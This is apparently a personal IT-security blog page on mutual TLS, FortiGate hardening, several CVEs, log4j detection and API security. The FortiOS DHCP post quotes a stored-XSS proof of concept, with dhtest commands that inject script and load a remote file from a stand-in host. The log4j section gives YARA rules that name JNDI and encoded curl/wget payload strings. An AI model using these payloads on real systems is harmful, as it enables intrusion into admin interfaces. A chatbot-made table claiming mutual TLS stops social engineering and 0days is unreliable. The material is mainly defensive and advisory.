Showing posts with label Vulnerability. Show all posts

Almost perfect protection for websites and other services - Mutual TLS

Its hard to secure your IT services and applications. The list of possible attacks is long, as shown in the Mitre Att&ck framework, the OWASP lists and so on.

What helps drastically reducing the attack surface is to use mutual TLS (explanations see https://www.cloudflare.com/learning/access-management/what-is-mutual-tls/ or https://en.wikipedia.org/wiki/Mutual_authentication#mTLS or https://www.youtube.com/watch?v=x7B5CwcxCDI or https://www.ietf.org/rfc/rfc5246.txt) for authentication to establish access to your service/application. If you use certificates to authenticate your clients before accessing the first byte to of your service/application, you stop attacks at OSI layer 5. The attackers cant reach OSI layer 6 and 7 which contain the most vulnerabilites and weaknesses by far.

I've asked ChatGPT to make a list to compare regular web applications with web applications, which use mutual TLS:

Attack Type	Regular Web Application	Secured Web Application (Mutual TLS)	Mitre ATT&CK Tactic(s)
Cross-Site Scripting (XSS)	Vulnerable	Protected	Initial Access, Execution, Persistence
SQL Injection	Vulnerable	Protected	Collection, Credential Access, Execution
Cross-Site Request Forgery (CSRF)	Vulnerable	Protected	Initial Access, Collection
Session Hijacking	Vulnerable	Protected	Collection, Credential Access
Brute Force Attacks	Vulnerable	Protected	Credential Access, Execution
Clickjacking	Vulnerable	Protected	Collection, Defense Evasion
Directory Traversal	Vulnerable	Protected	Collection, Exfiltration
File Upload Vulnerabilities	Vulnerable	Protected	Execution, Collection
LDAP Injection	Vulnerable	Protected	Collection, Credential Access
Man-in-the-Middle (MitM) Attacks	Vulnerable	Protected	Collection, Credential Access, Execution
Remote File Inclusion	Vulnerable	Protected	Execution, Collection
XML External Entity (XXE) Injection	Vulnerable	Protected	Collection, Credential Access
Security Misconfigurations	Vulnerable	Way less vulnerable	Defense Evasion, Discovery
HTTP Header Injection	Vulnerable	Protected	Defense Evasion, Execution
DDoS Attacks	Vulnerable	Way less vulnerable	Impact
API Security Issues	Vulnerable	Protected	Collection, Credential Access, Execution
HTTP Parameter Pollution	Vulnerable	Protected	Defense Evasion, Execution
Session Sidejacking	Vulnerable	Protected	Credential Access, Collection
Social Engineering Attacks	Vulnerable	Protected	Collection, Defense Evasion
Cross-Site Tracing (XST)	Vulnerable	Protected	Credential Access, Collection
Fuzzing Attacks	Vulnerable	Protected	Execution, Defense Evasion
Cryptanalysis	Vulnerable	Way less vulnerable	Collection, Credential Access
Reverse Engineering	Vulnerable	Protected	Collection, Credential Access
Subdomain Takeover	Vulnerable	Protected	Initial Access, Collection
Session Token Theft	Vulnerable	Protected	Credential Access, Collection
Vulnerabilies/0days	Vulnerable	Way less vulnerable	Initial Access
Broken Object Level Authorization (BOLA)	Vulnerable	Protected	Credential Access, Authorization
Improper Rate Limiting	Vulnerable	Way less vulnerable	Defense Evasion, Impact
Insecure Direct Object References (IDOR)	Vulnerable	Protected	Collection, Credential Access
Insufficient Logging and Monitoring	Vulnerable	Way less vulnerable	Discovery, Defense Evasion
Insecure Deserialization	Vulnerable	Protected	Execution, Defense Evasion
Lack of Resources and Rate Limiting	Vulnerable	Protected	Defense Evasion, Impact
Mass Assignment	Vulnerable	Protected	Credential Access, Collection
Insecure Cryptographic Storage	Vulnerable	Vulnerable	Collection, Credential Access
Use of Components with Known Vulnerabilities	Vulnerable	Way less vulnerable	Collection, Execution
Unvalidated Redirects and Forwards	Vulnerable	Protected	Defense Evasion, Initial Access
XML External Entity (XXE) Injection	Vulnerable	Protected	Collection, Credential Access

Caution: This is a simplified point of view - it is only focusing on the inital access. Mutual TLS certificate based authentication make the initial access for attackers almost impossible. Therefore most attacks are not possible anymore without the attackers gets his hands on a client certificate with its private key. However your IT stack is still vulnerable to OSI layer 1-5 attacks as well as e.g. to vulnerabilities within OpenSSL, LibreSSL etc.

Mini/Reverse/Web-Shells explained

The website explainshell.com explains Mini/Reverse/Web-Shells (T1505.003):

More examples:

FortiGate admin interface authentication bypass

There are rumors about a vulnerability in Fortinets FortiGate firewalls where you may bypass authentication on their admin interfaces. Affected seem to be FortiOS 7.0.x and FortiOS 7.2.0/1. A fix is included in FortiOS 7.0.7 and FortiOS 7.2.2. It is written the vulnerability has CVE-2022-40684.

It is imperative that you protect your FortiGate interfaces with TrustedHosts AND Local-In-Policies. Only using TrustHosts protects HTTPS, SSH, etc but not other protocols like SIP, IPsec, CAPWAP, BGP, SSLVPN* etc which are also local services running on the FortiGate, which need to be protected, too.

*SSLVPN = Even though SSLVPN might be not configured and therefore seems to be inactive, in some cases for example vulnerability-scanners still trigger the SSLVPN service to log errors in FortiGates log. This only is solved by setting up local-in-polices.

Example for trusthost & local-in-policy:

CLI configuration:

System > Administrators >
config system admin
    edit "admin"
        set trusthost1 172.26.73.48 255.255.255.255
        set accprofile "super_admin"
        set vdom "root"
    next
end

Configuring address and address group as per the trusted hosts:

config firewall address
    edit "trusted-1"
        set type ipmask
        set comment ''
        set visibility enable
        set associated-interface ''
        set color 0
        set allow-routing disable
        set subnet 172.26.73.48 255.255.255.255
    next
end

config firewall addrgrp
    edit "trusted_grp"
        set member "trusted-1"
        set comment ''
        set visibility enable
        set color 0
    next
end
Configuring Firewall local in policies:

config firewall local-in-policy
    edit 2
        set intf "port1"
        set srcaddr "trusted_grp"
        set dstaddr "all"
        set action accept
        set service "PING"
        set schedule "always"
        set status enable
        set comments ''
    next
    edit 1
        set intf "port1"
        set srcaddr "all"
        set dstaddr "all"
        set action deny
        set service "PING"
        set schedule "always"
        set status enable
        set comments ''
    next
end

Remember: This example shows the local-in-policy only for "ping". You want to protect all services (except for example SSLVPN or IPsec if you use them).

Paessler PRTG fixes OpenSSL vulnerability CVE-2022-1292

Paesslers PRTG version 22.3.79 will update its internal OpenSSL libraries to 1.0.2ze in order to address and fix CVE-2022-1292. CVE-2022-1292 is categorized as CWE-78 (Improper Neutralization of Special Elements used in an OS Command 'OS Command Injection').

PRTG release notes of version 22.3.79:
[Security] We updated our OpenSSL libraries to version 1.0.2ze that patches CVE-2022-1292.

CVE-2022-1292 is about the OpenSSL c_rehash script, which does not properly sanitise shell metacharacters to prevent command injection.

Citrix ICA SSO saved credentials in XOR obfuscated readable storage

The Citrix ICA application stores user credentials for its SingleSignOn SSO functionality in readable form using XOR obfuscation with the key „C“, as Benjam Delpy wrote: https://twitter.com/gentilkiwi/status/1570525137962930176

Mimikatz version 3 will be able to reveal this as shown in the following GIF with Windows 11 and Credential Guard enabled: https://video.twimg.com/tweet_video/Fcudz49XoAAfNHO.mp4

Video in higher quality

Myths of IT Security

I recently saw Linus Neumann from the Chaos Computer Club in a video talking about IT security myths which I try to explain all time, however Linus listed them so elegantly in his video, I want to repeat them as text:

❔ "Why should they be interested in me?"

Answer: Their business model is not based on customers. The attackers are not interested in you. They just cast their net and you just got/will get caught as one of many fish. They go for the masses in which you are part of, not you as a person.

❔ "My password is very strong, so I use it everywhere!"

Answer: You password must be unique per site/service! If one site is hacked, you might not even know about it and your credentials can be used everywhere, because they are not unique. Follow the tipps here.

❔ "The attackers want to hurt me!"

Answer: No, mostly they just want to make money. In a ransomware attack for example they dont want to hurt you. Instead they want to get your money.

❔ "This is now secure and it stays that way."

Answer: IT-Security is an onging process. IT systems have an operating system, applications, libraries, middleware etc which all consist of many million lines of software code. And in these lines of code are many vulnerabilites, which are not found yet. But some day they will be found, get public knowledge and can be exploited. That is why IT security is an onging process.

❔ "Attackers have special technical skills."

Answer: Some might, but often they dont. Because when a vulnerability becomes public knowledge most of the time an exploit is written. And that exploit can be used by anyone. That is why its "not fair" - the attackes have and this as an advantage.

❔ "Everything can be hacked, so we are powerless!"

Answer: No, because there are many things which can be implemented and done, so an attack becomes so hard, that almost no one will try it.
Examples can be found here and here or as shown in the graphic: Start with implementing vulnerability-management, hardening (use a framework like cis, nist, etc), implement zero trust network or microsegmentation, implement 2fa or mfa, etc.

Source: https://www.guardicore.com/wp-content/uploads/2019/01/Gartner-pyramid-CWPP.png

IT-Security newsletter recommendations

There are many newsletters, a few of them I can recommend:

SANS NewsBites

I'd compare it to reading international newspapers, narrowed down to IT-Security news only and to a very short summary of each topic. Keeps you informed about things that happen outside your tiny view of the world and about topics which are not covered by your daily website like https://www.heise.de/security/

"SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible."

=> https://www.sans.org/newsletters/ Registration for newsletter
=> Archive Available Examples

SANS @RISK: The Consensus Security Alert

A brief summary about the most critical or exploited vulnerabilities. Obviously your vulnerability scanning and management like Qualys, Tenable, Rapid7 or whatever you are using is the first source about your environment, but sometimes it is good to have a feeling about a vendor or product or you see products affected which are not in your environment, but in a connected one like one of your suppliers or service providers.

"@RISK provides a reliable weekly summary of (1) newly discovered attack vectors, (2) vulnerabilities with active new exploits, (3) insightful explanations of how recent attacks worked, and other valuable data"

=> https://www.sans.org/newsletters/ Registration for newsletter
=> Archive Available Exmples

FullDisclosure

No typical newsletter, instead if informs you about vulnerabilities. If you feel like there are too many mails comming from FullDisclosure, a trick could be to use a mail rule to put the mails in to a dedicated folder, with the expection of the vendors and products your are using. So for example if you are using VMware, Splunk, F5 networks, Fortinet, Paessler, Extreme Networks, Ubuntu or *any*-vendor products, then type in their names as exception-words to the mail rule. Then these mails will stay in your inbox.

"A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. More importantly, fresh vulnerabilities sometimes hit this list many hours or days before they pass through the Bugtraq moderation queue."

=> https://seclists.org/fulldisclosure/ Registration for newsletter

PRTG Hardening Security CSRF

PRTG version 22.1.74 introduces protection from Cross Site Request Forgery (CSRF) attacks to harden the products security.

In CSRF the attacker sends the victim an URL with an action, like adding an administrative account, transfering some money to another bankaccount or something similar. When the victim clicks on the link, the (unintended) action is executed with the victims permissions. Implementing XSRF tokens prevent this attack.

Updating PRTG server to 22.1.74 prevents changes to PRTG via web forms that attackers may use to trick PRTG users into performing requests with the user account's context. (CVE-2021-34547)

Source: https://www.paessler.com/prtg/history/stable

Exploit: https://github.com/likhihcv/PRTG_Network_Monitor_20.1.55.1775_CSRF

Explot payload:

PRTG user accounts after executing payload:

New log4j 1.x vulnerabilities

Apache.org is warning about new log4j vulnerabilities:

CVE-2022-23302

CVE-2022-23302 is a high severity deserialization vulnerability in JMSSink. JMSSink uses JNDI in an unprotected manner allowing any application using the JMSSink to be vulnerable if it is configured to reference an untrusted site or if the site referenced can be accesseed by the attacker. For example, the attacker can cause remote code execution by manipulating the data in the LDAP store.

CVE-2022-23305

CVE-2022-23305 is a high serverity SQL injection flaw in JDBCAppender that allows the data being logged to modify the behavior of the component. By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed.

CVE-2022-23307

CVE-2022-23307 is a critical severity against the chainsaw component in Log4j 1.x. This is the same issue corrected in CVE-2020-9493 fixed in Chainsaw 2.1.0 but Chainsaw was included as part of Log4j 1.2.x.

Detect "log4shell" log4j RCE - CVE-2021-44228

The very critical CVE-2021-44228 can be detected by the following methods as Florian Roth has posted them on GitHub: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

Log4Shell - log4j RCE exploitation detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

This command searches for exploitation attempts in compressed files in folder /var/log and all sub folders

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'

YARA

Preliminary YARA rules (work in progress)

rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
   meta:
      description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 60
   strings:
      $x1 = "${jndi:ldap:/"
      $x2 = "${jndi:rmi:/"
      $x3 = "${jndi:ldaps:/"
      $x4 = "${jndi:dns:/"
   condition:
      1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
   meta:
      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 80
   strings:
      $x1 = /\$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
      $fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
   condition:
      $x1 and not 1 of ($fp*)
}

rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
   meta:
      description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/Reelix/status/1469327487243071493"
      date = "2021-12-10"
      score = 70
   strings:
      /* curl -s  */
      $sa1 = "Y3VybCAtcy"
      $sa2 = "N1cmwgLXMg"
      $sa3 = "jdXJsIC1zI"
      /* |wget -q -O-  */
      $sb1 = "fHdnZXQgLXEgLU8tI"
      $sb2 = "x3Z2V0IC1xIC1PLS"
      $sb3 = "8d2dldCAtcSAtTy0g"
   condition:
      1 of ($sa*) and 1 of ($sb*)
}

Source: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

Apache Shiro Vulnerability RCE CVE-2016-4437 - not detected by Qualys and Tenable

Vulnerability-scanning and management is one of the most important topics in IT-security and unfortunately most companies forget or even dont know about it. Recently the US agency CISA published a list of 292 known exploited critical vulnerabilities and a binding operational directive 22-01, which forces US institutions to patch/fix/mitigate the vulnerabilites of the list within 15 or 30 days.

However the vulnerability-scanner-vendors Qualys and Tenable both do not detect the critical rce vulnerability CVE-2016-4437 in apache shiro, or at least not yet:

Qualys on 07th of November 2021:
Tenable on 07th of November 2021:

https://www.tenable.com/cve/CVE-2016-4437

Both vendors have been contacted, maybe they'll add the signature for the critical vulnerability.

Qualys also has published a dashboard for the binding operational directive 22-01: https://blog.qualys.com/vulnerabilities-threat-research/2021/11/08/qualys-response-to-cisa-alert-binding-operational-directive-22-01

Offtopic PS: I'm a bit excited that a CVE is on the list or CISA, which I reported :-)

Zenmap show SSHv2 algorithms/cipher suite

Discover the used SSHv2 algorithms/cipher suite using nmap or zenmap can be done using the follwing nse-script and steps:

URL: https://nmap.org/nsedoc/scripts/ssh2-enum-algos.html
Download: https://svn.nmap.org/nmap/scripts/ssh2-enum-algos.nse

Howto Use Guide

Download NSE-Script
Save nse-script-file into your ...\NMap\Scripts\ folder
$NMap\Scripts\ folder screenshot$
Run nmap or zenmap and the command: nmap --script ssh2-enum-algos *your-target*

Example Output

Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-03 21:18 Mitteleuropäische Zeit
Nmap scan report for 10.140.68.24
Host is up (0.016s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
| ssh2-enum-algos: 
|   kex_algorithms: (10)
|       curve25519-sha256
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group16-sha512
|       diffie-hellman-group18-sha512
|       diffie-hellman-group14-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       rsa-sha2-512
|       rsa-sha2-256
|       ssh-rsa
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com

Author: Kris Katterjohn
License: Same as Nmap--See https://nmap.org/book/man-legal.html

Windows CVE-2021-34527 PrintNightmare - Useful flowchart

@wdormann posted a very useful flowchart regarding Windows CVE-2021-34527 PrintNightmare: https://www.kb.cert.org/vuls/id/383432

CSW CVE-2021-34527 PrintNightmare Windows Vulnerability

Further information can be found here: https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-233732-1032.pdf?__blob=publicationFile

API security - How to start securing APIs

APIs are great, they are everywhere and they grow. When thinking about API security very often very basic security mechanisms are missing. This article is about the very minimum frist steps you should always take:

First steps to think about

Only expose the parts of the interface which are necessary, not the entire API
Only collect and publish the data which is really necessary
Only grant access to people/systems which need it
Switch sides and think like an attacker ("Write a black mirror episode about your API", Keith Casey 2019)

API gateway

Use API gateways, because they take care of:

Lifecycle: In which state is your API? How was it designed and built? To which gateways is it published and is it live & available?
Interface: What does it expose? Which resources, methods, objects and fields?
Access: Who can use it? Which users or groups, which authentication, which clients, which contexts?
Usage: How to succeed with it? API documentation, debugging and errors, tracking usage, examples & sdks?
Business: How does it drive business goals? Partner CRM, marketing, business analytics

API gateways like apigee, kong, apache apisix, krakenD, the list is long. Great overview about open source api gateways: https://www.predic8.de/open-source-api-management-kong-tyk-fusio-umbrella-wso2.htm

API Access

Use available standards like OpenID connect. Don't just use OAuth Core, but instead the OpenID connect, because you'd probably missing a lot of different additional important standards. A list of the few common OAuth/OIDC specifications may show why:

(Source: https://www.youtube.com/watch?v=D7AfQKxFC0U)

Input validation

There are so many different attack vectors. One of the most basic yet so often missing things is good input validation, which helps stopping classical attacks like XSS, injections, deserialization and so on. But it also stops breaking the programms intention or in other words its business logic.

Input validation should be applied in the enforcment of correct syntax (e.g. SSN, date, currency symbol), so the syntactic level and for semantic validation to enforce correctness of their values in the specific business context (e.g. start date is before end date, price is within expected range).

There is so much more

https://owasp.org/www-project-api-security/
https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html
https://attack.mitre.org/techniques/T1106/
Regularly updating your systems of which the api is built on
Harden your systems, applications, middleware, runtime-environment and interfaces of which the api is built on
Do regularly penetration testing and vulnerability scanning
Enhance and regularly review logging & monitoring including automized alerts based on thresholds

How to increase IT security of a company using quick wins

How to increase my companys IT security? Of course there are many, many, many topics, processes, systems, parameters, awareness and a lot more to implement, adjust, train, improve or get rid of. Following the different available frameworks like MITREs Att&ck, the recommendations from NIST or BSI etc will get you there. However they require a lot of time and some companys want to implement some 'quick wins', before they do they adopt a whole framework (which they should).

So some of those 'quick wins' are:

Implement Multi-Factor-Auth or 2FA. Trying to balance security with comfort will let you win your users, for example by implementing MFA or 2FA using PushTokens.
Raising awareness by regularly sending internal phishing mails will make them learn and understand, not to open or click on everything.
Implementing zero trust or microsegmentation will make lateral movement hard.
Regularly scanning your whole environment for vulnerabilities and configurations issues with regular patching and improving hardening will dramatically reduce your attack surface.
Restrict administrative permissions, regularly checking if they are still necessary, implementing JIT and securing your directory services using special jump servers with MFA/2FA will help further. Also don't use Microsofts AD Built-in default groups because very often the have to many unnecessary permissions

Some more are described in an article from Microsoft security blog. I personally don't agree on all of them, but it is a possible approach:

Picture from https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

(Picture from Microsoft security blog)

Keeping in mind the point of view from an attacker might help:

(Picture from Microsoft security blog)

FortiOS XSS in DHCP-Monitor

Fortinet has released PSIRT FG-IR-19-184 (CVE-2019-6697) about a vulnerability in FortiOS of the FortiGate firewall. A DHCP packet may contain a stored XSS in the hostname parameter field.

Affected Versions and Update

Affected Products are FortiOS 6.2.1 and below & FortiOS 6.0.6 and below.

FortiOS 6.2.2 and FortiOS 6.0.7 fix the vulnerability

PoC/Vulnerability Details from ssd-disclosure.com

Source: https://ssd-disclosure.com/archives/3987/ssd-advisory-fortigate-dhcp-stored-xss

An unauthenticated attacker can trigger a Stored XSS Vulnerability via a malicious DHCP packet in the Fortigate DHCP Monitor.

This can happen if Device Detection is enabled through Network >Interface > Edit Interface > Device Detection

When this option is enabled the attacker may perform the following steps in order to exploit the vulnerability:

Install dhtest or any other tool that can send arbitrary DHCP packets.
(https://sargandh.wordpress.com/2012/02/23/linux-dhcp-client-simulation-tool/)

Send a malicious DHCP packet. For example:

#./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "x<svg onload=alert();)>x"
    [Option]
    -m : mac address
    -h : hostname(dhcp option 12). The attacker can inject malicious scripts.

#./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "x<svg onload=alert();)>x"

[Option]

-m : mac address

-h : hostname(dhcp option 12). The attacker can inject malicious scripts.

Once the victim logs into Fortigate’s dashboard and goes to the “DHCP Monitor”
(https://<ip>/ng/dhcp/monitor) the browser will execute the malicious script injected by the attacker.

But there are a few limitations:

The user’s input is validated, not allowing us to use tags like “<script src>”, “<img src=_onerror=>” and other similar options. There are also character count limits:

DHCP option 12 has a string size limit allowing only up to 256 characters. More information
about this option is available in the RFC.
Fortigate’s string size can’t be longer than 128 characters.

However, Fortigate uses jQuery which allows the attacker to bypass the mentioned restrictions and execute arbitrary scripts using the following method:

#./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "x<svg onmouseover=$.getScript('//www.example.jp/a.js')>x"

Source: https://ssd-disclosure.com/archives/3987/ssd-advisory-fortigate-dhcp-stored-xss